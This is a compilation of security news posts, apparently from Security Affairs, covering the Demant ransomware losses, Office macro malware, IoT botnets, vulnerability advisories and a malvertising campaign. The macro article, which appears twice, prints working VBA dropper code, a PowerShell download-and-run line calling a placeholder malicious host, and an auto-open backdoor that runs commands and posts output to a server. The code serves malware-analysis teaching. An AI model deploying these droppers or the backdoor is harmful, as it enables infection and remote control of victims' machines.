“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported ComputerWord.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant network have not been able to regularly provide to their service to end-users.

The impact is predominately related to the estimated lost sales and on the growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is important because demonstrates the potential impact of a cyber attack on organizations and urges them to adopt necessary countermeasures.

The massive NotPetya ransomware attack caused billions of dollars to organizations worldwide, the shipping giant Maersk and courier service FedEx incurred in over $300 million each. In April, the Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 after cyber attack appeared first on Security Affairs.

Frequent VBA Macros used in Office Malware

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

The post Frequent VBA Macros used in Office Malware appeared first on Security Affairs.

Gucci IOT Bot Discovered Targeting European Region

Security Labs discovered a new IOT bot named “GUCCI”. It seems like the IOT botnet is named after an Italian luxury brand of fashion and leather goods.

Analysis

The discovery came to exist during our reconnaissance and intelligence collection process.  The IOT threat detection engine picked the infection IP has shown below hosting number of bins for different architectures

Gucci

Figure 1: GUCCI Bot Binaries

All the bins were successfully downloaded and magic headers were analyzed to check the type of file. Figure 2 highlights how the GUCCI bot binaries are compiled.

Figure 2:  Bot: compiled Binaries

As you can see the output in Figure 2, all the Gucci bot binaries are “stripped”.  This means that when these binaries were compiled all the debug symbols were removed from these executables to reduce the size. Listing 1 highlights the Md5 hashes of the binaries being analyzed.

MD5 (arm) = b24e88da025e2e2519a96dd874e6ba8bMD5 (arm5) = 24ef4178e365c902cfdd53d0ea0d1dc2MD5 (arm6) = 5a5a27635570b2c3634cab62beadc951MD5 (arm7) = c1ef67719e9762fc46aeb28a064fe0aeMD5 (m68k) = 2b984677ab9ee264a2dae90ca994a2a6MD5 (mips) = a0e0da3ae1ad1b94f0626c3e0cb311adMD5 (mpsl) = ee26f791f724f92c02d976b0c774290dMD5 (ppc) = e16f594cbdd7b82d74f9abc65e0fe677MD5 (sh4) = a70d246e911fe52638595ea97ed07342MD5 (spc) = d1b719ab9b7be08ea418b47492108dfaMD5 (x86) = de94d4718127959a494fe8fbc4aa5b2a
Listing 1: MD5 Hashes of the Gucci Bit Binaries

The binaries were found to be obfuscated in nature. On further analysis, it was analyzed that the Gucci bot was connecting to the  remote IP on the  TCP port “5555” and transmitting the data accordingly.  Digging deeper, we found that the remote host running a custom telnet service on TCP port 5555 and exchanging commands with Gucci bots regularly. When a test connection was initiated on TCP port 5555  using telnet client on remote IP,  the successful connection acceptance resulted in requirement of credentials.

Compromising C&C

Without authentication credential, it was not possible to access the service.  Considering all scenarios, automated brute force and account cracking attempts were performed. The account credentials were successfully cracked and connection was initiated and accepted as credentials are accepted.

Figure 3 highlights that Gucci bot Command and Control panel was hijacked and privilege access was obtained.                                                                                                                     

Figure 3: Gucci C&C Bot Panel

The C&C listed out the different type of Denial of Service (DoS) attack types supported by the Gucci bot. The support scans are:

  • HTTP null scan
  • UDP flood
  • Syn flood
  • ACK flood
  • UDP flood with less protocol options
  • GRE IP flood
  • Value Source Engine specific flood

It was noticed that Gucci bot was in early stages of deployment.  It was also analyzed that  the botnet operator was monitoring all the access connections to the Gucci C&C.  As soon as the botnet operator realized that the C&C has been compromised, the TCP service was removed from the host and operator cleaned the directories and performed an additional set of operations to hide indicators and artefacts.  The binaries were distributed from the location as provided in Figure 4

Figure 4: Gucci Bot – Source of Distribution

Inference

A new IOT bot Gucci has been discovered and analyzed accordingly.  The botnet operator was found to be very proactive. The whole analysis and obtaining C&C  access was like an arms race.  The purpose of this research is to share the discovery details with the security research community so that extracted intelligence can be used to fingerprint, detect and prevent Gucci bot infections. It is anticipated the Gucci botnet is still in active phase and targeting European region. However, the attacks triggered by Gucci bot could be broad based or targeted depending on the requirements.

About the authors:

Aditya K Sood is a Cyber Security Expert and working in the field for more than 11 years now. His work can be found at: https://adityaksood.com;

Rohit Bansal is a Principal Security Researcher at SecNiche Security Labs

Pierluigi Paganini

(SecurityAffairs – malware, botnet)

The post Gucci IOT Bot Discovered Targeting European Region appeared first on Security Affairs.

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Tridium’s Niagara product is affected by two vulnerabilities in BlackBerry’s QNX operating system for embedded devices.

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities in Tridium’s Niagara product that reside in the BlackBerry’s QNX operating system for embedded devices.

The flaws could be exploited by a local user to escalate their privileges.

The Niagara Framework is a universal software infrastructure developed by Tridium that allows building controls integrators, HVAC and mechanical contractors to build custom, web-enabled applications for accessing, automating and controlling smart devices real-time via local network or over the Internet.

Tridium Niagara product

The Niagara framework is widely adopted, especially in the commercial facilities, government facilities, critical manufacturing and IT sectors.

The security flaws impact Niagara AX 3.8u4, 4.4u3 and 4.7u1.

The most severe vulnerability, tracked as CVE-2019-8998, is an information disclosure flaw related to the procfs service that can be exploited by a local attacker for privilege escalation.

The flaw was discovered by Johannes Eger and Fabian Ullrich of the Secure Mobile Networking Lab at TU Darmstadt in Germany and received a CVSS score of 7.8.

“This advisory addresses an information disclosure vulnerability leading to a potential local escalation of privilege in the default configuration of the procfs service (the /proc filesystem) on affected versions of the BlackBerry QNX Software Development Platform (QNX SDP) that could potentially allow a successful attacker to gain unauthorized access to a chosen process address space.” reads the advisory.

BlackBerry QNX confirmed that it is not aware of attacks exploiting the flaw in the wild.

The second vulnerability, tracked as CVE-2019-13528, is an improper authorization issue, it could allow a specific utility to gain read access to privileged files.

“A specific utility may allow an attacker to gain read access to privileged files in the Niagara AX 3.8u4 (JACE 3e, JACE 6e, JACE 7, JACE-8000), Niagara 4.4u3 (JACE 3e, JACE 6e, JACE 7, JACE-8000), and Niagara 4.7u1 (JACE-8000, Edge 10).” reads the advisory.

This flaw was reported by Francisco Tacliad and it received a CVSS score of 4.4.

Tridium has released updates that address these vulnerabilities and recommends users update to the versions identified below:

  • Niagara AX 3.8u4: 
    • OS Dist: 2.7.402.2
    • NRE Config Dist: 3.8.401.1
  • Niagara 4.4u3:
    • OS Dist: 4.4.73.38.1 NRE Config
    • Dist: 4.4.94.14.1
  • Niagara 4.7u1:
    • OS Dist: (JACE 8000) 4.7.109.16.1
    • OS Dist (Edge 10): 4.7.109.18.1
    • NRE Config Dist: 4.7.110.32.1

Pierluigi Paganini

(SecurityAffairs – Tridium, IoT)

The post Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS appeared first on Security Affairs.

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

A recently observed a malvertising campaign carried out by a threat group dubbed eGobbler that hijacked roughly 1.16 billion ad impressions.

Researchers at Confiant observed a malvertising campaign carried out by a threat actor dubbed eGobbler hijacked roughly 1.16 billion ad impressions to redirect victims to websites hosting malicious payloads.

The campaign was observed between August 1 and September 23.

The eGobbler group was first observed by security firm Confiant in April when it was exploiting a security flaw in the Google Chrome browser to target millions of iOS users. At the time, Cofiant experts estimated that more than 500 million malicious ads had been served to iOS users.

This time eGobbler hackers extended their attacks to Windows, Linux, and macOS desktop devices.

“Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.” reads the analysis published by Confiant.

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.”

In recent campaign, attackers used an exploit that targets WebKit based browsers, the researchers observed redirections on WebKit browsers upon the ‘onkeydown’ event.”

“The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame.” continues the analysis. “With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.”

Experts also discovered that the payload used in this campaign had specifically targeted some web applications using text areas and search forms in order to maximize the chances of hijacking these keypresses.

“eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing,” states Confiant.

Experts reported the bug to both the Chrome and Apple security teams, the latter answered within the hour while on August 9 the former responded that they were investigating.

On August 12, the Chrome team provided an update that a patch was submitted to WebKit on August 9:

Apple addressed the issue in iOS 13 on September 19 and in Safari 13.0.1 on September 24.

The analysis published by the experts includes Indicators of Compromise for the recent campaign, including a list of content delivery network (CDNs) used by eGobbler threat actor to delivery the malicious payloads.

Pierluigi Paganini

(SecurityAffairs – eGobbler, hacking)

The post eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions appeared first on Security Affairs.

A new critical flaw in Exim exposes email servers to remote attacks

Exim maintainers released an urgent security update to address a critical security flaw that could allow a remote attacker to potentially execute malicious code on targeted servers.

Exim maintainers released an urgent security update, Exim version 4.92.3, to address a critical security vulnerability that could allow a remote attacker to crash or potentially execute malicious code on targeted email servers.

The flaw is a heap-based buffer overflow, tracked as CVE-2019-16928, that resides in the string_vformat (string.c). An attacker could exploit the flaw using an extraordinary long EHLO string to crash the Exim process that is receiving the message.

“There is a heap-based buffer overflow in string_vformat (stringc). The currently known exploit uses extraordinary long EHLO string to crash the Exim process that is receiving the message. While this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.” reads the security advisory published by the maintainers.

The CVE-2019-16928 flaw was reported by Jeremy Harris of Exim Development Team, it affects all versions of the Exim email server software from 4.92 up to and the version 4.92.2. The expert also released a PoC exploit for this vulnerability.

Early September, the Exim development team has addressed another vulnerability in the popular mail server, tracked as CVE-2019-15846. The vulnerability could be exploited by local and remote attackers to execute arbitrary code with root privileges.

The vulnerability is a heap overflow that affects version 4.92.1 and prior of Exim mail server that accepts TLS connections. The vulnerability affects both GnuTLS and OpenSSL.

In mid-June, researchers observed several threat actors exploiting another flaw in the popular software, tracked as CVE-2019-10149, that resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server. The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

Exim also patched a severe remote command execution vulnerability (CVE-2019-10149) in its email software that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers.

The major Linux distributions, including UbuntuArch LinuxFreeBSDDebian, and Fedora, already released security updates.

Pierluigi Paganini

(SecurityAffairs – Mail Server, hacking)

The post A new critical flaw in Exim exposes email servers to remote attacks appeared first on Security Affairs.

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

After 2 years of waiting, MalwareMustDie returns with an excellent page of malware analysis of a new IoT malware: Linux/AirDropBot.

Yes, I have to confess, it was hard to wait all this time, but the reward it was worth it: unixfreaxjp is return, with a new, great page of reverse engeeniring published on the MalwareMustDie blog post: “MMD-0064-2019 – Linux/AirDropBot

And this is not only “the” Odisseus’s opinion, just because I can be addressed as a member of  MalwareMustDie crew: this last post IT IS a masterpiece technically speaking, because here unixfreaxjp reveals some unique and undocumented best practices in order to reverse Linux malware binaries (Intel and not Intel platforms), providing to every whitehat reverser many references and howtos to deal with ELF Linux malware, mixing theory and practice and showing how is incredibly useful the use of Radare r2 and Tsurgi distribution.

Don’t know if is because I have asked to my friend unixfreaxjp many times to publicly show how Radare r2 can be be used with great results, but after this post we can definitively state that, once again, Radare r2 has nothing to envy of the best commercial tools used in many reverse engineering tutorials that are available on Youtube.

In fact this time we have not a “simple” blog post, but a rich, strong and powerful technical lesson on how stripped binaries can be reversed even if they are “indeed” stripped.

Unixfreaxjp step by step leads the reader to understand how a malware code is build, which are the methods, which are the secrets, with are the hidden techniques used by the coders to hide and encrypt as much as possible the C2 address, how the operative commands coming from the C2 are parsed, and how almost everything can be reconstructed to get the source code back from any stripped binary.

The beginning of the story: another IoT malware in the wild?

But let’s go back to the beginning of the story when my very good friend @0xrb found in his honeypot this new “Mirai like” Linux malware, which has important differences with the Mirai implementation. He understood immediately that there was something strange in this new “Mirai variant”, to proposing the sample to MalwareMustDie team: here it is his early tweet.

It is possible to give a look also to the logs of the malware that @0xrb published on Pastebin: here a lot of information is made available during the running phase. One of them, for example, is the C2 server.

The C2 of the botnet was: 147.135.174.119

As unixfreaxjp states in his post, @0xrb has successfully submitted the sample to MalwareMustDie team in order to better analyze it, and the result is another great page of Linux malware reversing, that every malware analyst should read and re-read.

We will overfly the technical analysis because the MalwareMustDie post is extremely clear and explanatory in every single part of its analysis.

Coming to the core topic: IoT botnet threat and their ecosystem

New Linux developed malware aiming internet of things is happening a lot, and as previously mentioned, it has been driven by the money scheme that is fueling its botnet ecosystem as per previously posted in Security Affairs, this is still the main reason why new freshly coded malware in this sector is always coming up.

